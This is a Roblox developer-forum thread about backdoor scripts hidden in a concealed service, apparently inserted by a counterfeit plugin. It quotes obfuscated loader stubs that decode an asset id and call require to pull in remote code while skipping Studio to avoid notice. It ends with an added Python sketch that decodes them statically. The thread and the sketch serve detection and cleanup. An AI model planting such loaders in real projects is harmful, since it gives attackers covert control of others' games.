Removing backdoor scripts located in a hidden service?

If you enable “Show hidden objects in explorer” in Roblox Studio settings, you can find a service named “NonReplicatedCSGDictionaryService”.


--[[ 278097 ]]--

spawn(function()game:WaitForChild('\83\101\114\118\101\114\83\99\114\105\112\116\83\101\114\118\105\99\101')if game:GetService('\87\111\114\107\115\112\97\99\101').Terrain:FindFirstChild('\67\97\108\108\70')then return end;if game:GetService('\82\117\110\83\101\114\118\105\99\101'):IsStudio()then return end;pcall(function()getfenv()['\114\101\113\117\105\114\101'](math.sqrt(math.sqrt(4.9693005147685e+37) - 122013)).load(game.PlaceId)end)end)

or

--[[ 278097 ]]--

marketplaceService = game:GetService('MarketplaceService') productInfo = marketplaceService:GetProductInfo(2655062037) modulefunc = productInfo.Description modulefunc = tonumber(string.match(modulefunc, '%d+')) if game:GetService('RunService'):IsStudio()then return end getfenv()['require'](modulefunc)[tostring(productInfo.Name)](game.PlaceId)

I’ve seen a thread talking about this same thing, but they found it by disabling internet and then getting errors from these scripts, if I recall correctly.

Edit: if you ever find a script like this, just delete it and verify that all your plugins are indeed original and not some ripoff backdoor infecting rathole.

This turned out to be a stub of the SirHurt backdoor, which is basically nonexistent at this point, so this exact code shouldn’t exist anymore.


SirHurt was inside of @Toadiant’s game, DisneyLand Robloxia, 'SirHunt' exploit happening to my game

3 Likes

You likely installed a plugin that does this; many of them disguise themselves to look identical to popular trusted plugins. Find the culprit by disabling plugins one by one and seeing if the scripts still appear in a new place.

And for clarity: yes, this is most likely a malicious insertion of a backdoor or similar.

1 Like

There’s a plugin which helps you remove these but you’ll need to find the plugin doing it as well. Most likely these backdoor scripts are outdated as well.

They use Backpacks to run code which has already been fixed.

It also appears they check if the game is Studio so that you can’t see any errors.

It looks like a plugin is doing this. I checked for myself and I see nothing of that sort.

Also this is what the code looks like and it leads to a deleted module or something.

spawn(function()
game:WaitForChild('ServerScriptService')
if game:GetService('Workspace').Terrain:FindFirstChild('CallF') then return end;
if game:GetService('RunService'):IsStudio() then return end;
pcall(function() getfenv()['require'](2655056793).load(game.PlaceId) end)
end)

In theory you SHOULDN’T have to worry about it anymore, but it’d help if you could at least locate the plugin that’s doing this.

1 Like
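Added example, not part of the thread or any poster's code: a Python sketch that statically decodes the first stub quoted above. It reverses the decimal escapes and evaluates the arithmetic inside `require(...)` without executing the script, so the asset id can be compared with the deobfuscated version in the last reply. The function names are hypothetical; the stub is copied from the thread as analysis input.

```python
import ast
import math
import re

# First stub quoted in the thread, copied verbatim as analysis input (never executed).
STUB = (
    r"spawn(function()game:WaitForChild('\83\101\114\118\101\114\83\99\114\105\112\116\83\101\114\118\105\99\101')"
    r"if game:GetService('\87\111\114\107\115\112\97\99\101').Terrain:FindFirstChild('\67\97\108\108\70')then return end;"
    r"if game:GetService('\82\117\110\83\101\114\118\105\99\101'):IsStudio()then return end;"
    r"pcall(function()getfenv()['\114\101\113\117\105\114\101']"
    r"(math.sqrt(math.sqrt(4.9693005147685e+37) - 122013)).load(game.PlaceId)end)end)"
)

def decode_escapes(src):
    # Lua decimal escapes: a backslash followed by up to three digits.
    return re.sub(r"\\(\d{1,3})", lambda m: chr(int(m.group(1))), src)

def safe_number(expr):
    # Evaluate numeric literals, + - * / and math.sqrt only; eval() is never used.
    ops = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
           ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}
    def walk(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, (int, float)):
            return n.value
        if isinstance(n, ast.BinOp) and type(n.op) in ops:
            return ops[type(n.op)](walk(n.left), walk(n.right))
        if (isinstance(n, ast.Call) and ast.unparse(n.func) == "math.sqrt"
                and len(n.args) == 1 and not n.keywords):
            return math.sqrt(walk(n.args[0]))
        raise ValueError("unsupported expression")
    return walk(ast.parse(expr.strip(), mode="eval").body)

def require_targets(src):
    # Return (raw argument, resolved asset id or None) for every require call.
    text, found = decode_escapes(src), []
    for m in re.finditer(r"require(?:['\"]\])?\s*\(", text):
        depth, i = 1, m.end()
        while i < len(text) and depth:          # walk to the matching ")"
            depth += {"(": 1, ")": -1}.get(text[i], 0)
            i += 1
        arg = text[m.end():i - 1]
        try:
            found.append((arg, round(safe_number(arg))))
        except (ValueError, SyntaxError):
            found.append((arg, None))           # id is fetched at run time
    return found

def indicators(src):
    # Names from the thread's stubs that are worth flagging in a hidden script.
    text = decode_escapes(src)
    return [n for n in ("getfenv", "IsStudio", "GetProductInfo") if n in text]
```

For the second stub in the first post, the `require` argument is a variable filled from `GetProductInfo` at run time, so the resolved id comes back as `None` and the script should be flagged on its indicators alone.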